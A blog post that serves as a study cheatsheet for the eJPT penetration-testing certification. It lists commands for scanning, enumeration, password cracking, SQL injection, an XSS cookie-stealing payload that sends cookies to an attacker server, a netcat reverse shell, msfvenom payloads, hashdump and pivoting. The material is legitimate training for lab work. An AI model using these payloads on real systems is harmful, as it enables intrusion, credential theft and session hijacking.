Introduction

Anyone in the information security or penetration testing field knows how deep a topic, or even a certificate may go, and as we progress deeper into the field; it gets harder to keep track of the knowledge gained. For me personally, notes, cheatsheets, and mind maps are the best way to keep track of things.

As far as studies go, the eLearnSecurity Junior Penetration Tester (eJPT) is an entry-level, beginner-friendly, and a great starting pointing to get some fundamentals of networking, programming, and penetration testing; all for an affordable price.

It is a 100% practical certification with great labs, and excellent learning materials which covers TCP/IP, IP routing, LAN protocols and devices on the networking side. On the penetration testing side, it covers the essential processes and methodologies, along with basic vulnerability assessments of networks and web applications, and finally, exploitation via Metasploit. And as a bonus! It also covers basic fundamentals of programming languages such as C++, Python, and Bash.

Of course, in this blog post, I won’t cover the entirety of the course materials, nor will I cover any theory; it will only serve as a commands cheatsheet to help aide students at a quick glance.

Information Gathering

Information gathering is the most essential and important part of any penetration test, without information of the networks, web applications or technologies we are dealing with; we won’t be able to do much.

So, whenever you see yourself not getting anywhere or stuck, that means you haven’t enumerated enough; fall back into the information gathering or enumeration phase.

Discovery

As we get one a new network, it is important for us to discover assets, or targets. We will show various methods of discovery covered in the course, plus a few additional tools which may prove helpful.

Ping Sweep

Using fping:

fping -a -g <ip_range>

# example
fping -a -g 10.10.10.0/24

Using nmap:

nmap -sn <ip_range>

# example
nmap -sn 10.10.10.0/24

Additional Tools

Using arp-scan:

arp-scan -l

Using netdiscover:

netdiscover -r <ip_range>

# example
netdiscover -r 10.10.10.0/24

Using masscan:

masscan <ip_range>

# example
masscan 10.10.10.0/24

Routing

If we discovered a different network subnet through a different source, and noticed we can’t reach that network from our machine; we can add routes to that network.

To display the current routes:

Using route in Linux:

route -n

Using ip in Linux:

ip route

Using arp in Linux and Windows:

arp -a

To add a route and pivot

In Linux:

ip route add <ip/cidr> via <from_ip>

# example
ip route add 10.10.11.0/24 via 10.10.11.85

In Windows:

route ADD <ip> MASK <mask> <from_ip>

# example
routa ADD 10.10.10.0 MASK 255.255.255.0 10.10.10.85

Wireshark Snippets

request.method == "POST"     
http & ip.src == 192.168.0.1     
tcp.port == 80
tcp.srcport == 21
http.request
  • After capturing/ opening traffic:
    • Follow -> TCP Stream

Scanning

After we have discovered our targets, we have to probe the targets in order to find out what is it running? Is it a server, printer, or router? Here are a few methods for scanning:

Nmap

To use SYN scan for specific ports:

nmap -sS -p <port,port> <ip>

# example
nmap -sS -p 22,80,443,445 10.10.10.10

To use TCP scan on all ports with verbose output and increased speed:

nmap -sT -p- -v -T4 <ip>

# example
nmap -sT -p- -v -T4 10.10.10.10

To not resolve DNS, treat host as up and save the output to file:

nmap -sT -n -Pn -oN <outputFile> <ip>

# example
nmap -sT -n -Pn -oN output.nmap 10.10.10.10

Enumeration

When we are done scanning, and we’ve noted the servers, printers, routers, etc. We proceed to enumerating our targets by getting version information, vulnerability information, and probe information.

Network Enumeration

Nmap

To use the version scan:

nmap -sV 10.10.10.10

To use the OS scan:

nmap -O 10.10.10.10

To aggressively scan:

nmap -A 10.10.10.10

To use the default script scan:

nmap -sC 10.10.10.10

Nmap Scripting Engine

Using script categories, a complete list can be found here:

# to discover more details and versions
nmap --script discovery 10.10.10.10

# to discover known vulnerabilities
nmap --script vuln 10.10.10.10

To use a specific script instead of categories, they are found in /usr/share/nmap/scripts/:

# look for the script you want
ls /usr/share/nmap/scripts | grep smb

# run it without the file extention (.nse)
nmap --script smb-enum-shares 10.10.10.10

# can also use the * wildcard to run all of specific module
nmap --script smb-* 10.10.10.10

Windows Shares

Using nbtstat in Windows:

nbtstat -A 10.10.10.10

Using net view in Windows:

# to list shares
net view 10.10.10.10

# to mount a share
net use \\10.10.10.10\shareName

# to mount with null session
net use \\10.10.10.10\shareName '' /u:''

Using nmblookup in Linux:

nmblookup -A 10.10.10.10

Using enum4linux in Linux:

enum4linux -a 10.10.10.10

Using smbclient to enumerate and mount share in Linux:

# to list available shares
smbclient -L //10.10.10.10

# to list with null session
smbclient -L //10.10.10.10

# to mount a found share with null session 
smbclient //10.10.10.10/shareName -N

NOTE: Nmap can also enumerate shares and websites via scripts, it can also test for broken authentications and brute force logins; play around with the scripts in /usr/share/nmap/scripts/ search for http or smb.

Web Enumeration

If the target is running a web server, we will want to both manually and automatically probe the running website for information of the technologies behind the website.

Directory Busting

Using dirb:

# using default wordlist
dirb http://10.10.10.10

# using authentication username:password
dirb http://10.10.10.10/project/backup -u admin:admin

# using extensions for web pages
dirb http://10.10.10.10 -X .php

For more comprehensive and advanced usage of dirb, check this article by HackingArticles.

Subdomain Enumeration

DNSDumpster caches subdomains if you wish to passively look for it.

Using sublist3r:

sublist3r -v -d <domain> -b

# example
sublist3r -v -d example.com -b

Using OWASP’s Amass:

# installation via snap
sudo apt install snapd
sudo service snapd start
sudo snap run amass

# basic usage
amass -ip -d google.com

Using gobuster:

gobuster dir -u http://10.10.10.2/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt

# with extentions for web pages
gobuster dir -u http://10.10.10.2/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -x php,txt,bak,old,html,xxx

Web Server Enumeration

Using nikto:

nikto -h http://10.10.10.10

# for https websites
nikto -h http://10.10.10.10 -ssl

Using netcat for HTTP:

nc -v target.site 80
HEAD / HTTP/1.0

# GET HTTP verb example
GET /page.php HTTP/1.0
Host: www.example.com

# POST HTTP verb example
POST /login.php HTTP/1.0
Host: www.example.com

username=potato&password=potato

# PUT HTTP verb example
PUT /path/to/destination HTTP/1.0
Host: www.example.com

username=tomatp&password=tomato

# DELETE HTTP verb example
DELETE /path/to/destination HTTP/1.0
Host: www.example.com

# OPTIONS HTTP verb example
OPTIONS / HTTP/1.0
Host: www.example.com

Using openssl for HTTPS:

openssl s_client -connect target.site:443
HEAD / HTTP/1.0

NOTE: Nessus can also do all the above, but we won’t cover that; maybe in a future blog post.

Exploitation

After we have enumerated thoroughly, we get proceed to search for available exploits matching our enumerated target’s versions, and exploit it.

Password Attacks

A dictionary attack can always be useful, especially if our targets have simple passwords and/or reuse old passwords.

Dehashing the Linux user’s password hash:

  1. First we will need both the /etc/passwd and /etc/shadow files, both of the files combined will enable us to dehash and help the passwords.
unshadow passwd shadow > crackable_passwords.txt
  1. Then we will use John the Ripper to crack the passwords with a dictionary attack:
# we can specify users from the file
john -incremental -users:root,potato crackable_passwords.txt --wordlist=/usr/share/wordlists/rockyou.txt

# to display cracked passwords
john crackable_passwords.txt --show

Hashcat

# to list example hashes for mode identification
hashcat --example-hashes

# example command
hashcat -m 0 -a 0 -D2 example.hash wordlists.txt

Hydra

Hydra is a powerful brute forcer, as it supports many different protocols to attempt dictionary attacks:

# for help on specific module
hydra -U rdp
hydra -U http-get

# example command
hydra -L users.lst -P passwords.lst <service_name://server> <options>

# for ssh
hydra -l root -P rockyou.txt ssh://10.10.10.10

# for ftp
hydra -L users.lst -P passwords.lst  ftp://10.10.10.10

# for HTTP login
hydra -L /usr/share/ncrack/minimal.usr -P /usr/share/seclosts/Passwords/rockyou-15.txt http://crackme.site http-form "/login.php:usr=^USER^&pwd=^PASS^:invalid credentials" -f -V

Web Exploitation

Vulnerabilities may also be found on web applications if the programming logic is flawed or not handled correctly.

Cross Site Scripting (XSS)

Three kinds of Cross Site Scripting (XSS) attacks:

  1. Reflected XSS
  2. Stored XSS
  3. DOM XSS

Testing for XSS with alert popup:

<script>alert('XSS');</script>

Cookie stealing via alert popup:

<script>alert(document.cookie)</script>

Cookie stealing by redirecting victim site to pull data from our malicious server:

  1. Create a simple PHP file that will log data into another file: log.php
<?php
	$filename="/tmp/log.txt";  
	$fp=fopen($filename,  'a');  
	$cookie=$_GET['q'];  
	fwrite($fp,  $cookie);  
	fclose($fp);  
?>
  1. Leverage XSS to call to our server, along with the cookie:
<script>
var - = new Image();
i.src="http://our.site/log.php?q="+document.cookie;
</script>

SQL Injections (SQLi)

Finding SQL Injections

Testing an input for SQLi, try:

  • String terminators: ' and "
  • SQL commands: SELECT, UNION, etc
  • SQL comments: # or --

Enumerating using Boolean based SQLi

Examples:

select substring(user(), 1, 1);

select substring(user(), 1, 1) = 'r';
#returns true

select substring(user(), 1, 1) = 'a';
# returns false

#this way we can brute force for information
  • ' or substr(user(), 1, 1)= 'a
  • ' or substr(user(), 1, 1)= 'b
  • … so on until we get username

Exploiting Boolean Based SQLi

  • An always true statement ' OR '1'='1
  • An always false statement ' OR '1'='11
  • Add a comment to nullify the remaining ' or 1=1; -- -'

Exploiting Union Based SQLi

  • ' UNION SELECT user(); -- -
  • ' UNION SELECT null; -- - (if still error, then another field required)
  • ' UNION SELECT null, null; -- - (if still error, then another field required and so on)
  • ' UNION SELECT 'user1', 'user2'; -- -

SQLMap

sqlmap -u <url> -p <injection_param> [options]

# U for union based injections
sqlmap -u 'http://victim.site/view.php?id=1121' -p id --technique=U

# example of switches we will use
--curent-db
-D <current_db> --tables
-D <db> -T <table> --columns
-D <db> -T <table> -C username,password --dump

To specific data extractions via blind SQLi using POST parameter:

# to get database banner
sqlmap -u "http://sqlmap.test/login.php" --data='user=a&pass=a' -p user --technique=B --banner

# to get database name
sqlmap -u "http://sqlmap.test/login.php" --data='user=a&pass=a' -p user --technique=B --dbs

# to get database tables
sqlmap -u "http://sqlmap.test/login.php" --data='user=a&pass=a' -p user --technique=B -D blogdb --tables

# to get database table columns
sqlmap -u "http://sqlmap.test/login.php" --data='user=a&pass=a' -p user --technique=B -D blogdb -T users --columns

# to get database table columns
sqlmap -u "http://sqlmap.test/login.php" --data='user=a&pass=a' -p user --technique=B -D blogdb -T users -C username,password --dump

To automate the above data dumping process:

sqlmap -u "http://sqlmap.test/login.php" --data='user=a&pass=a' -p user --technique=B --dump

To use SQLMap through a saves request:

# grab databse banner
sqlmap -r login.req -p user --technique=B --banner

# to reset cache
sqlmap -r login.req -p user --technique=B --flush-session 

# dump database
sqlmap -r login.req -p user --technique=B --dump

Host Exploitation

The host itself can also be exploited if the server/host is not up to date, or is running a vulnerable version of an application.

Netcat

We will use netcat to send a shell from victim to attacker:

# On attacker machine, listen with netcat
nc -lvnp 5555

# On victim machine, send shell back to attacker
ncat -e cmd.exe <attacker_ip> 5555

ARP Spoofing

# to enable ip forwarding in linux
echo 1 > /proc/sys/net/ipv4/ip_forward

# start spoofing on specified network interface and IP
arpspoof -i tap0 -t 10.10.10.2 -r 10.10.10.6

Metasploit

The Metasploit Framework is an framework that is built to aide in every step of a penetration test; from scanning and enumeration to exploitation and post-exploitation. Let’s see how it works.

MSFVenom

This is to generate payloads:

# For a Linux executable payload
msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=172.16.64.2 lport=59919 -f elf -o meter

# For a PHP payload
msfvenom -p php/meterpreter_reverse_tcp lhost=10.13.37.4 lport=53 -o meterpreter.php

# For a .war payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.97.68.2 LPORT=443 -f war > shell.war

# for a Windows executable payload
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=172.16.64.2 lport=59919 -f exe -o meter.exe

MSFConsole

Quick usage:

# first start the database for metasploit
sudo systemstl start postgresql

# to run metasploit
sudo msfconsole

# to list all available commands
> help

# to search for any module (scanner, exploits, etc)
> search <name>
> search mssql

# to use a specific module
> use <name>
> use auxiliary/scanner/mssql/mssql_login

# to display that module's information
> info

# to display that module's options
> options

# to set that module's required options
> set <option> <value>
> set USER_FILE users.lst

# to run a module
> run

# to run in background
> exploit -j

# to go one back
> back

Payloads & Listeners

Payloads

80+ payloads available

# to list all paylaods
msf > show payloads

# windows 32 bit payload
msf > set payload windows/meterpreter/reverse_tcp

# linux 32 bit payload
msf > set payload linux/x86/meterpreter/reverse_tcp

# windows 32 bit bind payload  
msf > set payload windows/meterpreter/bind_tcp

# java bind payload
msf > set payload java/meterpreter/bind_tcp

Listener Setup

> use exploit/multi/handler
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST <our_ip>
> set LPORT <our_port>
> exploit -j

Meterpreter

Enumeration

# computer info
meterpreter > sysinfo

# ip addr info
meterpreter > ifconfig

# print route info
meterpreter > route

# Get current user
meterpreter > getuid

# privilege escalation
meterpreter > getsystem

# print working directory
meterpreter > pwd

# change directory
meterpreter > cd Desktop

# download item
meterpreter > download passwords.txt

# upload item
meterpreter > upload backdoor.exe C:\\Windows\\system32 # escape backslash

# to show sessions
msf > sessions

# to interact with a specific session
msf > sessions -i <session_id>
msf > sessions -i 1

# to background or minimize a sessions
meterpreter > background
msf >

# open a cmd shell
meterpreter > shell

Post-Exploitation

After we have exploited a target, we can enumerate the target for sensitive and further information leading to the exploitation for more targets on the network or even on different network subnets.

Enumeration

NOTE: The Meterpreter section above also contains enumeration guide via Meterpreter.

Linux:

# show network information
ifconfig

# show connected networks information
arp -a

# show ip routes
ip route

# show current user
id

Windows:

# show netword information
ipconfig

# show connected networks information
arp -a

# show ip routes
route print

# show current user
whoami

# show current user privileges
whoami /privs

Privilege Escalation

# bypass UAC (user access control)
meterpreter > background
msf > search bypassuac
msf > use exploit/windows/local/bypassuac
msf > set session 1
msf > run

# dump password database
meterpreter > back
msf > use post/windows/gather/hashdump
msf > set session 1
msf > exploit

# migrate to another process with higher privileges
meterpreter > ps # list processes and pick one
meterpreter > migrate 2682 # process id
meterpreter > getsystem # to get higher privileges with new process id

Pivoting

SSH Tunneling

Port forwarding using SSH:

ssh -L <remote_port>:<localhost>:<localport> [email protected]

# example
ssh -L 8080:localhost:8000 [email protected]

Meterpreter

Routing

# using route
msf > route print
msf > route add 192.179.61.0 255.255.255.0 1  # last number is session id

# using autoroute, can be done two ways
meterpreter > run autoroute -s 192.179.61.0 -n 255.255.255.0 # method 1
meterpreter > run autoroute -s 172.16.50.0/24 # method 2
# to print route
meterpreter > run autoroute -p

Port Forwarding

meterpreter > portfwd -h
meterpreter > portfwd add -l 1234 -p 21 -r 192.179.61.3
meterpreter > portfwd add -l 1235 -p 80 -r 192.179.61.2

Conclusion

My own personal notes for the eLearnSecurity Junior Penetration Tester (eJPT) course is very messy and unorganized cause I’m too lazy to fix it up. So instead of doing that, I decided to make an organized cheatsheet in this blog post if ever I wish to recall something, or if another student ever needs a quick helping guide for the eJPT exam.

I hope this cheatsheet helps you pass the exam as it did for me.